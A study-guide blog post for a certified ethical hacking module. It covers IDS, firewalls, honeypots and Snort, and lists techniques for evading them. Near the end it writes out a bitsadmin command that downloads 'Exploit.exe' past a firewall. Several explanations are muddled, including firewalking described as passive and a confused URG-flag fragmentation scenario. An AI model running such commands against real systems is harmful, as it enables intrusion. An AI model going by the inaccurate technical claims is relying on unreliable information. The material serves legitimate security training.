CEH-Module12 - Evading IDS, Firewalls, and Honeypots
Website Visitors:Intrusion Detection System
An Intrusion Detection System (IDS) is a security tool designed to monitor network or system activities for malicious activities or policy violations and produce reports to a management station. IDS doesn’t stop anything that it detects instead it only reports it. IDS come in two main types:
-
Network Intrusion Detection Systems (NIDS): These monitor network traffic for suspicious patterns that may indicate an attack. They are placed at strategic points within the network to monitor traffic to and from all devices on the network.
-
Host Intrusion Detection Systems (HIDS): These run on individual hosts or devices on the network and monitor inbound and outbound packets from the device only.
IDS use various detection methods, including signature-based detection, which looks for specific patterns or signatures of known attacks, and anomaly-based detection, which looks for deviations from normal behavior. IDS can be a standalone appliance or a software application running on a server or workstation.
Where Is IDS Placed In Network
In a computer network, an IDS (Intrusion Detection System) is typically placed at strategic points to monitor network traffic for suspicious activity or security breaches.
-
Network Perimeter: IDS can be placed at the network perimeter, where traffic enters or leaves the network. This can include devices like firewalls or routers that filter incoming and outgoing traffic.
-
Internal Network: IDS can also be placed within the internal network to monitor traffic between different segments or devices. This helps in detecting lateral movement of threats within the network.
-
Critical Points: IDS can be deployed at critical points in the network where sensitive information is stored or processed, such as servers hosting databases or financial systems.
-
Cloud Environments: In cloud environments, IDS can be deployed in virtual networks or on cloud-hosted servers to monitor traffic within the cloud infrastructure.
The placement of IDS depends on the network architecture and security requirements of the organization.
How an IDS Detects an Intrusion?
Anomaly-based detection in an Intrusion Detection System (IDS) works by comparing current network or system activity to a baseline of normal behavior. Here’s how it typically works:
-
Baseline Establishment: The IDS first establishes a baseline of normal behavior for the network or system. This baseline includes metrics such as network traffic volume, protocols used, typical user activities, and system performance.
-
Monitoring: The IDS continuously monitors network or system activity, collecting data such as packet headers, system logs, and other relevant information.
-
Different types of detection:
-
Signature Detection: Signature-based detection works by comparing network traffic or system activity against a database of known attack patterns, or signatures. When a match is found, the system can take action, such as alerting administrators or blocking the traffic. This method is effective against known threats but may struggle with detecting new or unknown attacks.
-
Anomaly Detection: Anomaly detection looks for deviations from normal behavior within the network or system. It establishes a baseline of normal activity and raises alerts when behavior deviates significantly from this baseline. While effective at detecting unknown threats, anomaly detection can also generate false positives if the baseline is not accurately defined.
-
Protocol Anomaly Detection: Protocol anomaly detection focuses on identifying abnormal or malicious behavior within network protocols. It looks for deviations from the expected protocol specifications, which could indicate an attack or misuse of the protocol. This approach can help detect certain types of attacks that exploit vulnerabilities in protocol implementations.
-
-
Alerting: If the IDS detects an anomaly, it generates an alert or notification to alert the system administrator or security team. The alert typically includes details about the detected anomaly and its potential impact.
-
Response: Based on the alert, the security team can investigate the anomaly further, take action to mitigate the potential threat, and update the IDS rules or baseline if necessary.
Anomaly-based detection is useful for detecting previously unknown or zero-day attacks that may not have a known signature. However, it can also generate false positives if the baseline is not accurately set or if there are legitimate changes in network or system behavior.
Intrustion Prevention System
An Intrusion Prevention System (IPS) is a security tool that monitors network or system activities for malicious activities, such as security threats or policy violations, and takes automated actions to block or prevent those activities. IPS builds upon the capabilities of an Intrusion Detection System (IDS) by adding the ability to actively prevent detected threats.
Key features of an IPS include:
-
Real-time Monitoring: Like an IDS, an IPS continuously monitors network or system traffic for suspicious activity.
-
Threat Detection: It uses various methods, including signature-based detection and anomaly-based detection, to detect known and unknown threats.
-
Automated Response: When a threat is detected, the IPS can take automated actions to block or prevent the threat. This may include blocking malicious IP addresses, dropping malicious packets, or reconfiguring firewall rules.
-
Alerting and Reporting: The IPS generates alerts and reports to notify administrators of detected threats and actions taken.
-
Integration with other Security Tools: IPSs are often integrated with other security tools, such as firewalls and IDSs, to provide comprehensive security coverage.
Overall, an IPS helps enhance the security of a network or system by actively preventing threats from causing harm, in addition to detecting and alerting on them.
Firewall
A firewall is a network security device (standard hardware device) or software (default windows defender, or iptables and ufw in linux) that monitors and controls incoming and outgoing network traffic based on predetermined security rules. It acts as a barrier between a trusted internal network and untrusted external networks, such as the internet, to prevent unauthorized access while allowing legitimate communication.
Key features of a firewall include:
-
Packet Filtering: Firewalls inspect packets of data as they pass through and apply rules to determine whether to allow or block them based on factors like source and destination IP addresses, ports, and protocols.
-
Stateful Inspection: Stateful firewalls keep track of the state of active connections and make decisions based on the context of the traffic, which helps prevent certain types of attacks, such as IP spoofing and session hijacking.
-
Proxy Service: Some firewalls act as proxies for inbound and outbound traffic, which means they establish a connection with the source or destination on behalf of the client, adding an additional layer of security.
-
Network Address Translation (NAT): Firewalls can perform NAT, which hides the internal IP addresses of devices from external networks, providing a layer of privacy and security.
-
Application Layer Filtering: Next-generation firewalls (NGFWs) can inspect traffic at the application layer and make decisions based on the content of the data, allowing for more granular control and better protection against advanced threats.
Firewalls are essential components of network security and are used in both home and enterprise environments to protect against unauthorized access, malware, and other cyber threats.
Bastion Host, Screened Subnet, Multi-Homed Firewall
Bastion Host: A bastion host is a highly secured server located on a perimeter network (DMZ) that is designed to withstand attacks. It is typically used to provide a single point of entry for access to a private network from an external network (like the internet). The bastion host is heavily secured and only allows specific types of traffic, such as SSH or HTTPS, from specific IP addresses. It acts as a gateway for traffic coming into and leaving the network.
Screened Subnet: A screened subnet, also known as a “demilitarized zone” (DMZ), is a network segment that is isolated from an organization’s internal network and is accessible from the internet. It typically contains servers that need to be accessible from the internet, such as web servers, email servers, or FTP servers. The screened subnet is protected by a firewall on each side, with the external firewall filtering incoming traffic and the internal firewall filtering traffic going to the internal network.
Multi-Homed Firewall: A multi-homed firewall is a firewall that has multiple network interfaces, each connected to a different network segment. This allows the firewall to separate and control traffic between different network segments, such as between an internal network and a DMZ. Multi-homed firewalls are often used in conjunction with bastion hosts and screened subnets to provide a layered approach to network security.
These concepts are often used together in network security architectures to create a layered defense strategy. The bastion host provides a hardened entry point into the network, the screened subnet isolates and protects servers that need to be accessible from the internet, and the multi-homed firewall controls traffic between different network segments.
What is DMZ
In networking, a Demilitarized Zone (DMZ) is a segregated network area that sits between an organization’s internal network (intranet) and an external network (typically the internet). The DMZ is a neutral zone, similar to the demilitarized zone between two countries, where military activity is prohibited.
The primary purpose of a DMZ in networking is to provide an additional layer of security by isolating external-facing services (such as web servers, email servers, or FTP servers) from the internal network. This segregation helps protect the internal network from direct exposure to external threats.
Key features of a DMZ in networking include:
-
Security: The DMZ is designed to host servers that need to be accessible from the internet. Placing these servers in the DMZ helps protect the internal network from external attacks.
-
Architecture: A typical DMZ setup includes one or more firewalls that control traffic between the internal network, the DMZ, and the external network. Traffic from the internet first enters the external firewall, which filters and forwards traffic to the DMZ. Another firewall separates the DMZ from the internal network, controlling and monitoring traffic between them.
-
Usage: Common services hosted in a DMZ include web servers, email servers, and FTP servers. These services require a degree of external access but need to be isolated from the internal network for security reasons.
-
Implementation: A DMZ can be implemented using physical network segmentation (using separate physical network switches) or logical segmentation (using VLANs on a single physical network).
Overall, a DMZ is an important component of network security architecture, providing a buffer zone between the internet and internal networks to protect sensitive data and services from external threats.
Honeypot
In networking, a honeypot is a security mechanism used to detect, deflect, or study attempts at unauthorized use of information systems. A honeypot is essentially a decoy server or system that is set up to attract and trap potential attackers.
Key points about honeypots include:
-
Purpose: Honeypots are used to gather information about attackers’ tactics, techniques, and procedures (TTPs) and to lure them away from more critical systems. They can also serve as an early warning system for detecting new or unknown threats.
-
Types: There are several types of honeypots, including low-interaction honeypots (which simulate only a limited set of services and interactions) and high-interaction honeypots (which simulate a complete operating system or application).
-
Deployment: Honeypots can be deployed within an organization’s internal network (internal honeypots) or in the DMZ to attract external attackers (external honeypots). They can also be deployed in the cloud to detect attacks targeting cloud-based resources.
-
Detection: Honeypots can detect attacks by monitoring network traffic, logging interactions with the decoy system, and analyzing patterns of behavior that may indicate malicious activity.
-
Risks: While honeypots can be valuable tools for detecting and studying attacks, they also carry risks. If not properly isolated, attackers may use them as a launching pad for attacks against other systems. Additionally, managing and monitoring honeypots requires resources and expertise.
Overall, honeypots can be an effective component of a comprehensive network security strategy, providing valuable insights into attackers’ methods and helping organizations improve their overall security posture.
Intrusion Detection Tools: Snort
Snort is a widely used open-source Intrusion Detection System (IDS) that is capable of performing real-time traffic analysis and packet logging on IP networks. It is highly flexible and can be used for a variety of purposes, including network traffic analysis, intrusion detection, and prevention.
Key features of Snort include:
-
Packet Sniffing: Snort captures and analyzes network packets as they pass through a network interface, allowing it to inspect traffic in real-time.
-
Signature-based Detection: Snort uses a set of pre-configured rules (signatures) to detect known threats and attacks based on patterns in network traffic.
-
Protocol Analysis: Snort can analyze network protocols and detect anomalies or suspicious behavior that may indicate an attack.
-
Flexible Rule Engine: Snort’s rule engine is highly configurable, allowing users to create custom rules to detect specific threats or to modify existing rules to suit their needs.
-
Logging and Alerting: Snort can log detected events to various output formats (e.g., text files, databases) and generate alerts to notify administrators of potential security incidents.
-
Community Support: Snort has a large and active user community that provides updates, new rules, and support for users.
Overall, Snort is a powerful and versatile tool for network security that can help organizations detect and respond to a wide range of threats and attacks.
Snort Rule
A Snort rule is a set of criteria used by the Snort Intrusion Detection System (IDS) to detect specific types of network traffic or behavior that may indicate a security threat. Each rule is written in a specific format and consists of several parts:
-
Rule Header: The rule header contains metadata about the rule, including the rule action, protocol, source and destination IP addresses, and ports.
-
Rule Options: The rule options specify the conditions that must be met for the rule to trigger. This can include specific content matches, protocol information, and other criteria.
Here is a basic example of a Snort rule:
|
|
In this example, the rule has the following components:
- Action:
alert
- This specifies that an alert should be generated when the rule matches. - Protocol:
tcp
- This specifies that the rule applies to TCP traffic. - Source and Destination IP Addresses:
any
- This specifies that the rule applies to traffic between any source and destination IP addresses. - Source and Destination Ports:
any 80
- This specifies that the rule applies to traffic between any source port and destination port 80 (HTTP). - Rule Options:
content:"GET"
- This specifies that the rule should trigger if the packet payload contains the string “GET”.msg:"HTTP GET request detected"
- This is a custom message that will be included in the alert.sid:100001
- This is a unique identifier for the rule.
When Snort detects traffic that matches this rule, it will generate an alert with the specified message and SID.
IDS Evasion Techniques
-
Insertion Attack: Embedding malicious code into seemingly benign data to evade detection by IDS, exploiting vulnerabilities in how data is parsed and analyzed.
-
Unicode Evasion: Using Unicode characters to encode malicious payloads, making it difficult for IDS to recognize and detect the attack.
-
Evasion: A general term for techniques used to avoid detection by IDS, including various methods such as fragmentation, obfuscation, and encryption.
-
Polymorphic Shellcode: Shellcode that changes its appearance each time it is executed, making it harder for IDS to create signatures to detect it.
-
Fragmentation Attack: Sending fragmented packets to bypass IDS that only inspect the initial fragment, allowing the malicious payload to evade detection.
-
ASCII Shellcode: Shellcode written in ASCII characters to avoid detection by IDS that may be looking for binary shellcode.
-
Denial-of-Service Attack: Overwhelming a system with excessive traffic or resource requests to disrupt its normal operation, potentially causing the IDS to fail to detect other attacks. Many IDSs use centralized server for logging alerts. If attackers know the ip of IDS log server, they perform DoS attack on the log server so that there will be no trace of the attacker.
-
Overlapping Fragments: Sending fragments that overlap in the hope of confusing the IDS, which may have difficulty reassembling the packet correctly to inspect it.
-
Application-Layer Attacks: Exploiting vulnerabilities in application protocols (such as HTTP, SMTP) to bypass network-level IDS and target specific applications.
-
Obfuscating: Concealing the true nature of an attack by using various techniques, such as encryption, encoding, or adding meaningless data to the payload.
-
Time-To-Live Attacks: Manipulating the Time-To-Live (TTL) field in IP packets to bypass IDS that use TTL values to identify suspicious traffic.
-
Desynchronization: Sending packets out of order or with incorrect sequence numbers to confuse the IDS, making it difficult to reconstruct the attack.
-
False Positive Generation: Sending legitimate traffic that triggers IDS alerts, overwhelming security analysts and potentially causing them to ignore real threats.
-
Urgency Flag: Setting the urgency flag in packets to bypass IDS that prioritize processing of urgent packets.
-
Session Splicing: Breaking an attack into multiple parts and sending them at different times or through different channels to evade detection.
-
Encryption: Using encryption to protect the contents of malicious payloads from detection by IDS that cannot decrypt the traffic.
-
Invalid RST Packets: Sending invalid TCP Reset (RST) packets to disrupt communication and potentially evade detection by IDS.
-
Flooding: Overwhelming a network or system with a high volume of traffic to cause a denial of service, potentially distracting IDS from detecting other attacks.
All the logs are commonly stored in a centralized location. Attackers identify those centralized log servers and perform Denial-Of-Service attack on those servers so that the IDS can’t log any logs to these servers.
Firewall Evasion Techniques
The following are some firewall bypassing techniques
- Port Scanning
- Firewalking
- Banner Grabbing
- IP Address Spoofing
- Source Routing
- Tiny Fragments
- Using an IP Address in Place of URL
- Using Anonymous Website Surfing Sites
- Using a Proxy Server
- ICMP Tunneling
- ACK Tunneling
- HTTP Tunneling
- SSH Tunneling
- DNS Tunneling
- Through External Systems
- Through MITM Attack
- Through Content
- Through XSS Attack
Obfuscation
Obfuscation is a technique used by attackers to evade firewalls and intrusion detection systems (IDS) by making their malicious traffic appear legitimate or innocuous. Firewalls and IDS systems rely on pattern matching and signature-based detection to identify and block malicious traffic. Obfuscation makes it challenging for these systems to detect and block malicious traffic, allowing attackers to bypass security controls and gain unauthorized access to a network or system.
Techniques Used in Obfuscation
- Packet Obfuscation: Modifying packet headers, payloads, or protocols to make them appear legitimate or innocuous.
- Protocol Obfuscation: Using non-standard or modified protocols to evade detection by firewalls and IDS systems.
- Data Obfuscation: Encrypting or encoding data to make it difficult for firewalls and IDS systems to inspect and analyze.
- Traffic Obfuscation: Disguising malicious traffic as legitimate traffic, such as using HTTP or HTTPS to tunnel malicious traffic.
Methods of Obfuscation
- Fragmentation: Breaking up packets into smaller fragments to evade detection by firewalls and IDS systems.
- Encryption: Encrypting data to make it difficult for firewalls and IDS systems to inspect and analyze.
- Tunneling: Using protocols such as HTTP, HTTPS, or SSH to tunnel malicious traffic through firewalls and IDS systems.
- Spoofing: Spoofing IP addresses, MAC addresses, or other identifying information to make malicious traffic appear legitimate.
Tools and Techniques Used by Attackers
- Obfuscation Tools: Tools such as Obfuscator, Packers, and Crypters are used to obfuscate malware and make it difficult to detect.
- Proxy Servers: Proxy servers are used to tunnel malicious traffic through firewalls and IDS systems.
- VPN: Virtual Private Networks (VPNs) are used to encrypt and tunnel malicious traffic through firewalls and IDS systems.
In conclusion, obfuscation is a powerful technique used by attackers to evade firewalls and IDS systems. Understanding the techniques and methods used by attackers is essential to developing effective countermeasures and best practices to prevent and detect obfuscated malicious traffic.
Session Splicing
Session splicing is a technique used by attackers to evade detection by firewalls and intrusion detection systems (IDS) by breaking up a malicious session into smaller, seemingly innocuous sessions. This technique is often used in conjunction with other evasion techniques, such as obfuscation and fragmentation, to make it difficult for security systems to detect and block malicious traffic.
How Session Splicing Works
- Breaking up the Session: The attacker breaks up a malicious session into smaller, seemingly innocuous sessions.
- Sending the Sessions: The attacker sends the smaller sessions to the target system, often using different protocols or ports.
- Reassembling the Session: The attacker reassembles the smaller sessions on the target system, allowing the malicious traffic to be executed.
Types of Session Splicing
- TCP Session Splicing: Breaking up a TCP session into smaller sessions, often using different sequence numbers or ports.
- HTTP Session Splicing: Breaking up an HTTP session into smaller sessions, often using different URLs or headers.
- FTP Session Splicing: Breaking up an FTP session into smaller sessions, often using different commands or file transfers.
Techniques Used in Session Splicing
- Fragmentation: Breaking up packets into smaller fragments to evade detection by firewalls and IDS systems.
- Obfuscation: Using encryption or encoding to make the malicious traffic appear innocuous.
- Tunneling: Using protocols such as HTTP or HTTPS to tunnel the malicious traffic through firewalls and IDS systems.
In conclusion, session splicing is a powerful technique used by attackers to evade detection by firewalls and IDS systems. Understanding the techniques and methods used by attackers is essential to developing effective countermeasures and best practices to prevent and detect session splicing attacks.
Fragmentation Attack
A fragmentation attack is a type of cyber attack that involves breaking down a malicious payload into smaller, innocent-looking packets that can bypass security measures. These packets are then reassembled at the target system, allowing the attacker to execute the malicious code.
Here’s an example of a fragmentation attack using a timeout:
TCP Fragmentation Attack with Timeout
In this example, an attacker wants to send a malicious packet to a target system, but the system’s firewall is configured to block packets with a certain signature. To bypass the firewall, the attacker breaks down the malicious packet into smaller fragments, each with a different signature.
The attacker sends the first fragment to the target system, which is allowed to pass through the firewall because it doesn’t match the blocked signature. The fragment is then stored in the system’s memory, waiting for the rest of the packet to arrive.
The attacker then sends the second fragment, but with a timeout value set to a very short period, such as 1 second. This causes the target system to wait for the next fragment to arrive within that time frame.
If the next fragment doesn’t arrive within the timeout period, the system will discard the previous fragments and close the connection. However, if the attacker sends the next fragment just before the timeout period expires, the system will reassemble the packet and execute the malicious code.
Example Fragmentation Attack Steps:
- Attacker breaks down malicious packet into smaller fragments (A, B, C, D)
- Attacker sends fragment A to target system, which passes through firewall
- Attacker sends fragment B with short timeout value (1 second)
- Target system stores fragment A and waits for fragment C to arrive within 1 second
- Attacker sends fragment C just before timeout period expires
- Target system reassembles packet and executes malicious code
This type of attack can be difficult to detect, as the individual fragments may appear harmless, and the timeout value can be set to a very short period to avoid detection. However, security measures such as packet reassembly and timeout analysis can help prevent such attacks.
URG Flag
In the context of fragmentation attacks, an urgency flag (also known as the “URG” flag) is a bit in the TCP header that indicates that the packet contains urgent data.
When the URG flag is set, it tells the receiving system to process the packet immediately, rather than waiting for the rest of the fragments to arrive. This is because the urgent data is typically used for out-of-band signaling, such as interrupting a process or canceling a request.
In the case of a fragmentation attack, an attacker might set the URG flag in one of the fragments to trick the target system into processing the packet immediately, rather than waiting for the rest of the fragments to arrive. This can help the attacker to bypass security measures or inject malicious code into the system.
Here’s an example of how an attacker might use the URG flag in a fragmentation attack:
- The attacker sends Fragment A with the URG flag set.
- The target system receives Fragment A and immediately processes it, without waiting for the rest of the fragments to arrive.
- The attacker sends Fragment B, which contains the malicious code.
- The target system receives Fragment B and reassembles the packet using Fragments A and B.
- The target system executes the malicious code, which can cause harm to the system or steal sensitive information.
By setting the URG flag, the attacker can trick the target system into processing the packet immediately, rather than waiting for the rest of the fragments to arrive. This can make it more difficult for security measures to detect and prevent the attack.
Time-To-Live Attack
A Time to Live (TTL) attack is a type of attack that exploits the TTL field in the IP header of a packet. The TTL field specifies the maximum number of hops (routers) that a packet can traverse before it is discarded.
Here’s how a TTL attack works:
- An attacker sends a packet with a low TTL value (e.g., 1 or 2) to a target system.
- The packet is routed through the network and reaches the first router.
- The router decrements the TTL value by 1 and forwards the packet to the next hop.
- Since the TTL value is low, the packet is likely to be discarded by the next router or the target system itself.
- However, before the packet is discarded, the target system or an intermediate router may respond to the packet with an ICMP error message (e.g., “TTL exceeded”).
- The attacker can use the ICMP error message to gather information about the target system or network, such as its IP address, subnet mask, or routing information.
Types of TTL attacks:
- TTL probing: An attacker sends packets with varying TTL values to a target system to determine the number of hops between the attacker and the target.
- TTL scanning: An attacker sends packets with low TTL values to a target system to gather information about the system’s network configuration and routing.
- TTL spoofing: An attacker manipulates the TTL value of a packet to make it appear as though it came from a different source or to evade security measures.
Detecting Honeypots
Attackers can determine the presence of honeypots by probing the services running on the system. Attackers craft malicious probe packets to scan for services such as HTTP over SSL (HTTPS), SMTP over SSL (SMPTS), and IMAP over SSL (IMAPS). Ports that show a specific service running but deny a three-way handshake connection indicate the presence of a honeypot. Tools to detect honeypots:
-
Send-safe Honeypot Hunter (http://www.send-safe.com)
-
kippo_detect (https://github.com)
Firewalking
Firewalking is a network reconnaissance technique used to discover information about the configuration of a remote network, specifically its firewall rules. It involves sending specially crafted packets with TTL (Time-To-Live) values set to expire exactly at the firewall’s interface. By analyzing the responses (or lack thereof) from the firewall, an attacker can infer which ports and services are being allowed or blocked by the firewall.
Let’s dive deeper into the concept of firewalking.
What is firewalking?
Firewalking is a network reconnaissance technique used to gather information about a network’s firewall rules and configuration. It involves sending packets to a target network with varying TTL (Time to Live) values to determine which ports are open and which are blocked by the firewall.
How does firewalking work?
Here’s a step-by-step explanation of the firewalking process:
- Initial probe: The attacker sends a packet with a low TTL value (e.g., 1) to the target network.
- ICMP response: The target network responds with an ICMP “TTL exceeded” message, indicating that the packet has reached the end of its TTL.
- TTL increment: The attacker increments the TTL value and sends another packet to the target network.
- Repeat steps 2-3: The attacker continues to send packets with increasing TTL values, analyzing the ICMP responses to determine which ports are open and which are blocked.
What information can be gathered through firewalking?
By analyzing the ICMP responses, the attacker can gather the following information:
- Open ports: Ports that allow incoming traffic.
- Blocked ports: Ports that are blocked by the firewall.
- Filtered ports: Ports that are filtered by the firewall, but may still allow incoming traffic under certain conditions.
- Firewall rules: The attacker can conclude from evidence, the firewall rules and configuration based on the ICMP responses.
Types of firewalking
There are two types of firewalking:
- TCP firewalking: This involves sending TCP packets to the target network to determine which ports are open and which are blocked.
- UDP firewalking: This involves sending UDP packets to the target network to determine which ports are open and which are blocked.
Tools used for firewalking
There are several tools available that can be used for firewalking, including:
- Nmap: A popular network scanning tool that can be used for firewalking.
- Hping: A command-line tool that can be used for firewalking.
- Firewalk: A tool specifically designed for firewalking.
Firewalking is considered a passive reconnaissance technique because it does not involve direct interaction with target hosts. However, it can provide valuable information to an attacker about potential vulnerabilities in a network’s firewall configuration.
Firewalking can be performed by Hping3 and Nmap script.
Bypass Firewall Rules using HTTP/FTP Tunneling
HTTP tunneling technology allows attackers to perform various Internet tasks despite the restrictions imposed by firewalls. This method can be implemented if the target company has a public web server with port 80 used for HTTP traffic that is unfiltered by its firewall. This technology encapsulates data inside HTTP traffic (port 80). Many firewalls do not examine the payload of an HTTP packet to confirm that it is legitimate, thus it is possible to tunnel traffic via TCP port 80.
HTTPort allows users to bypass the HTTP proxy, which blocks Internet access to e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC, etc. Here, the Internet software is configured, so that it connects to a local PC as if it is the required remote server; HTTPort then intercepts that connection and runs it via a tunnel through the proxy. HTTPort can work on devices such as proxies or firewalls that allow HTTP traffic. Thus, HTTPort provides access to websites and Internet apps. HTTPort performs tunneling using one of two modes: SSL/CONNECT mode and a remote host.
The remote host method is capable of tunneling through any proxy. HTTPort uses a special server software called HTTHost, which is installed outside the proxy-blocked network. It is a web server, and thus when HTTPort is tunneling, it sends a series of HTTP requests to the HTTHost. The proxy responds as if the user is surfing a website and thus allows the user to do so. HTTHost, in turn, performs its half of the tunneling and communicates with the target servers. This mode is much slower, but works in the majority of cases and features strong data encryption that makes proxy logging useless.
Bypass Firewall through Windows BITSAdmin
BITS (Background Intelligent Transfer Service) is an essential component of Windows XP and later versions of Windows operating systems. BITS is used by system administrators and programmers for downloading files from or uploading files to HTTP webservers and SMB file shares. BITSAdmin is a tool that is used to create download or upload jobs and monitor their progress.
Configure remote share completely and place a file Exploit.exe in that share path. Now run below command on your windows machine to copy that file using bits.
bitsadmin /transfer Exploit.exe http://10.10.1.13/share/Exploit.exe c:\Exploit.exe
Your inbox needs more DevOps articles.
Subscribe to get our latest content by email.